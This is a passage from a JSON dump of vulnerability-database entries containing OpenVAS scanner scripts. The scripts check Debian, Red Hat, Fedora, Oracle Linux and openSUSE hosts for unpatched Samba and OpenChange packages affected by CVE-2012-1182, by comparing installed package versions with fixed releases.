exit(0);\n }\n if ((res = isrpmvuln(pkg:\"evolution-mapi-devel\", rpm:\"evolution-mapi-devel~0.28.3~12.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"openchange\", rpm:\"openchange~1.0~4.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"openchange-client\", rpm:\"openchange-client~1.0~4.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"openchange-devel\", rpm:\"openchange-devel~1.0~4.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"openchange-devel-docs\", 
rpm:\"openchange-devel-docs~1.0~4.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:39:15", "description": "The remote host is missing an update to samba\nannounced via advisory DSA 2450-1.", "cvss3": {}, "published": "2012-04-30T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 2450-1 (samba)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-1182"], "modified": "2019-03-18T00:00:00", "id": "OPENVAS:136141256231071254", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231071254", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_2450_1.nasl 14275 2019-03-18 14:39:45Z cfischer $\n# Description: Auto-generated from advisory DSA 2450-1 (samba)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.71254\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2012-1182\");\n script_version(\"$Revision: 14275 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 15:39:45 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-04-30 07:56:34 -0400 (Mon, 30 Apr 2012)\");\n script_name(\"Debian Security Advisory DSA 2450-1 (samba)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB6\");\n script_xref(name:\"URL\", value:\"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%202450-1\");\n script_tag(name:\"insight\", value:\"It was discovered that Samba, the SMB/CIFS file, print, and login server,\ncontained a flaw in the remote procedure call (RPC) code which allowed\nremote code execution as the super user from an unauthenticated\nconnection.\n\nFor the stable distribution (squeeze), this problem has been fixed in\nversion 2:3.5.6~dfsg-3squeeze7.\n\nFor the testing distribution (wheezy), this problem will be fixed soon.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 2:3.6.4-1.\");\n\n script_tag(name:\"solution\", value:\"We recommend that you upgrade your samba packages.\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update to samba\nannounced via 
advisory DSA 2450-1.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"libpam-smbpass\", ver:\"2:3.5.6~dfsg-3squeeze7\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libsmbclient\", ver:\"2:3.5.6~dfsg-3squeeze7\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libsmbclient-dev\", ver:\"2:3.5.6~dfsg-3squeeze7\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libwbclient0\", ver:\"2:3.5.6~dfsg-3squeeze7\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"samba\", ver:\"2:3.5.6~dfsg-3squeeze7\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"samba-common\", ver:\"2:3.5.6~dfsg-3squeeze7\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"samba-common-bin\", ver:\"2:3.5.6~dfsg-3squeeze7\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"samba-dbg\", ver:\"2:3.5.6~dfsg-3squeeze7\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"samba-doc\", ver:\"2:3.5.6~dfsg-3squeeze7\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"samba-doc-pdf\", ver:\"2:3.5.6~dfsg-3squeeze7\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"samba-tools\", ver:\"2:3.5.6~dfsg-3squeeze7\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"smbclient\", ver:\"2:3.5.6~dfsg-3squeeze7\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"swat\", ver:\"2:3.5.6~dfsg-3squeeze7\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"winbind\", ver:\"2:3.5.6~dfsg-3squeeze7\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} 
else if (__pkg_match) {\n exit(99);\n}", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-01-03T10:57:48", "description": "Check for the Version of samba", "cvss3": {}, "published": "2012-04-11T00:00:00", "type": "openvas", "title": "RedHat Update for samba RHSA-2012:0465-01", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-1182"], "modified": "2018-01-03T00:00:00", "id": "OPENVAS:870581", "href": "http://plugins.openvas.org/nasl.php?oid=870581", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for samba RHSA-2012:0465-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Samba is an open-source implementation of the Server Message Block (SMB) or\n Common Internet File System (CIFS) protocol, which allows PC-compatible\n machines to share files, printers, and other information.\n\n A flaw in the Samba suite's Perl-based DCE/RPC IDL (PIDL) compiler, used\n to generate code to handle RPC calls, resulted in multiple buffer overflows\n in Samba. 
A remote, unauthenticated attacker could send a specially-crafted\n RPC request that would cause the Samba daemon (smbd) to crash or, possibly,\n execute arbitrary code with the privileges of the root user.\n (CVE-2012-1182)\n\n Users of Samba are advised to upgrade to these updated packages, which\n contain a backported patch to resolve this issue. After installing this\n update, the smb service will be restarted automatically.\";\n\ntag_affected = \"samba on Red Hat Enterprise Linux (v. 5 server)\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/rhsa-announce/2012-April/msg00002.html\");\n script_id(870581);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_version(\"$Revision: 8273 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-03 07:29:19 +0100 (Wed, 03 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-04-11 10:59:22 +0530 (Wed, 11 Apr 2012)\");\n script_cve_id(\"CVE-2012-1182\");\n script_xref(name: \"RHSA\", value: \"2012:0465-01\");\n script_name(\"RedHat Update for samba RHSA-2012:0465-01\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of samba\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = 
\"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"RHENT_5\")\n{\n\n if ((res = isrpmvuln(pkg:\"libsmbclient\", rpm:\"libsmbclient~3.0.33~3.39.el5_8\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbclient-devel\", rpm:\"libsmbclient-devel~3.0.33~3.39.el5_8\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba\", rpm:\"samba~3.0.33~3.39.el5_8\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-client\", rpm:\"samba-client~3.0.33~3.39.el5_8\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-common\", rpm:\"samba-common~3.0.33~3.39.el5_8\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-debuginfo\", rpm:\"samba-debuginfo~3.0.33~3.39.el5_8\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-swat\", rpm:\"samba-swat~3.0.33~3.39.el5_8\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-02T10:57:42", "description": "Check for the Version of samba4", "cvss3": {}, "published": "2012-05-17T00:00:00", "type": "openvas", "title": "Fedora Update for samba4 FEDORA-2012-6382", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-1182"], "modified": "2018-01-01T00:00:00", "id": "OPENVAS:864238", "href": "http://plugins.openvas.org/nasl.php?oid=864238", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for samba4 FEDORA-2012-6382\n#\n# Authors:\n# System Generated Check\n#\n# 
Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"samba4 on Fedora 16\";\ntag_insight = \"Samba 4 is the ambitious next version of the Samba suite that is being\n developed in parallel to the stable 3.0 series. 
The main emphasis in\n this branch is support for the Active Directory logon protocols used\n by Windows 2000 and above.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2012-May/080567.html\");\n script_id(864238);\n script_version(\"$Revision: 8265 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-01 07:29:23 +0100 (Mon, 01 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-05-17 10:31:56 +0530 (Thu, 17 May 2012)\");\n script_cve_id(\"CVE-2012-1182\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"FEDORA\", value: \"2012-6382\");\n script_name(\"Fedora Update for samba4 FEDORA-2012-6382\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of samba4\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC16\")\n{\n\n if ((res = isrpmvuln(pkg:\"samba4\", rpm:\"samba4~4.0.0~38.alpha16.fc16\", rls:\"FC16\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": 
"AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-23T13:10:36", "description": "Check for the Version of openchange", "cvss3": {}, "published": "2013-02-22T00:00:00", "type": "openvas", "title": "RedHat Update for openchange RHSA-2013:0515-02", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-1182"], "modified": "2018-01-23T00:00:00", "id": "OPENVAS:870928", "href": "http://plugins.openvas.org/nasl.php?oid=870928", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for openchange RHSA-2013:0515-02\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The openchange packages provide libraries to access Microsoft Exchange\n servers using native protocols. Evolution-MAPI uses these libraries to\n integrate the Evolution PIM application with Microsoft Exchange servers.\n\n A flaw was found in the Samba suite's Perl-based DCE/RPC IDL (PIDL)\n compiler. 
As OpenChange uses code generated by PIDL, this could have\n resulted in buffer overflows in the way OpenChange handles RPC calls. With\n this update, the code has been generated with an updated version of PIDL to\n correct this issue. (CVE-2012-1182)\n\n The openchange packages have been upgraded to upstream version 1.0, which\n provides a number of bug fixes and enhancements over the previous version,\n including support for the rebased samba4 packages and several API changes.\n (BZ#767672, BZ#767678)\n\n This update also fixes the following bugs:\n\n * When the user tried to modify a meeting with one required attendee and\n himself as the organizer, a segmentation fault occurred in the memcpy()\n function. Consequently, the evolution-data-server application terminated\n unexpectedly with a segmentation fault. This bug has been fixed and\n evolution-data-server no longer crashes in the described scenario.\n (BZ#680061)\n\n * Prior to this update, OpenChange 1.0 was unable to send messages with\n a large message body or with extensive attachment. This was caused by minor\n issues in OpenChange's exchange.idl definitions. This bug has been fixed\n and OpenChange now sends extensive messages without complications.\n (BZ#870405)\n\n All users of openchange are advised to upgrade to these updated packages,\n which fix these issues and add these enhancements.\";\n\n\ntag_affected = \"openchange on Red Hat Enterprise Linux Desktop (v. 6),\n Red Hat Enterprise Linux Workstation (v. 
6)\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/rhsa-announce/2013-February/msg00055.html\");\n script_id(870928);\n script_version(\"$Revision: 8494 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-23 07:57:55 +0100 (Tue, 23 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-02-22 10:02:03 +0530 (Fri, 22 Feb 2013)\");\n script_cve_id(\"CVE-2012-1182\");\n script_bugtraq_id(52973);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"RHSA\", value: \"2013:0515-02\");\n script_name(\"RedHat Update for openchange RHSA-2013:0515-02\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of openchange\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"RHENT_6\")\n{\n\n if ((res = isrpmvuln(pkg:\"evolution-mapi\", rpm:\"evolution-mapi~0.28.3~12.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"evolution-mapi-debuginfo\", rpm:\"evolution-mapi-debuginfo~0.28.3~12.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = 
isrpmvuln(pkg:\"openchange\", rpm:\"openchange~1.0~4.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openchange-debuginfo\", rpm:\"openchange-debuginfo~1.0~4.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:36:05", "description": "Oracle Linux Local Security Checks ELSA-2012-0465", "cvss3": {}, "published": "2015-10-06T00:00:00", "type": "openvas", "title": "Oracle Linux Local Check: ELSA-2012-0465", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-1182"], "modified": "2018-09-28T00:00:00", "id": "OPENVAS:1361412562310123940", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310123940", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2012-0465.nasl 11688 2018-09-28 13:36:28Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.123940\");\n script_version(\"$Revision: 11688 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-06 14:10:36 +0300 (Tue, 06 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2012-0465\");\n script_tag(name:\"insight\", value:\"ELSA-2012-0465 - samba security update. Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2012-0465\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2012-0465.html\");\n script_cve_id(\"CVE-2012-1182\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux(5|6)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux5\")\n{\n if ((res = isrpmvuln(pkg:\"libsmbclient\", rpm:\"libsmbclient~3.0.33~3.39.el5_8\", 
rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"libsmbclient-devel\", rpm:\"libsmbclient-devel~3.0.33~3.39.el5_8\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba\", rpm:\"samba~3.0.33~3.39.el5_8\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba-client\", rpm:\"samba-client~3.0.33~3.39.el5_8\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba-common\", rpm:\"samba-common~3.0.33~3.39.el5_8\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba-swat\", rpm:\"samba-swat~3.0.33~3.39.el5_8\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif(release == \"OracleLinux6\")\n{\n if ((res = isrpmvuln(pkg:\"libsmbclient\", rpm:\"libsmbclient~3.5.10~115.el6_2\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"libsmbclient-devel\", rpm:\"libsmbclient-devel~3.5.10~115.el6_2\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba\", rpm:\"samba~3.5.10~115.el6_2\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba-client\", rpm:\"samba-client~3.5.10~115.el6_2\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba-common\", rpm:\"samba-common~3.5.10~115.el6_2\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba-doc\", rpm:\"samba-doc~3.5.10~115.el6_2\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba-domainjoin-gui\", 
rpm:\"samba-domainjoin-gui~3.5.10~115.el6_2\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba-swat\", rpm:\"samba-swat~3.5.10~115.el6_2\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba-winbind\", rpm:\"samba-winbind~3.5.10~115.el6_2\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba-winbind-clients\", rpm:\"samba-winbind-clients~3.5.10~115.el6_2\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba-winbind-devel\", rpm:\"samba-winbind-devel~3.5.10~115.el6_2\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba-winbind-krb5-locator\", rpm:\"samba-winbind-krb5-locator~3.5.10~115.el6_2\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-01-02T10:57:41", "description": "Check for the Version of samba", "cvss3": {}, "published": "2012-08-02T00:00:00", "type": "openvas", "title": "SuSE Update for samba openSUSE-SU-2012:0508-1 (samba)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-1182"], "modified": "2017-12-28T00:00:00", "id": "OPENVAS:850289", "href": "http://plugins.openvas.org/nasl.php?oid=850289", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_suse_2012_0508_1.nasl 8253 2017-12-28 06:29:51Z teissa $\n#\n# SuSE Update for samba openSUSE-SU-2012:0508-1 (samba)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the 
terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Samba upgrade to version 3.6.3 fixes the following\n security issue:\n\n - PIDL based autogenerated code allows overwriting beyond\n the allocated array. Remote attackers could exploit that\n to execute arbitrary code as root (CVE-2012-1182,\n bso#8815, bnc#752797)\n\n Please see /usr/share/doc/packages/samba/WHATSNEW.txt from\n the samba-doc package or the package change log (rpm -q\n --changelog samba) for more details of the version update.\";\n\ntag_affected = \"update on openSUSE 11.4\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_id(850289);\n script_version(\"$Revision: 8253 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-28 07:29:51 +0100 (Thu, 28 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-08-02 23:28:59 +0530 (Thu, 02 Aug 2012)\");\n script_cve_id(\"CVE-2012-1182\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"openSUSE-SU\", value: 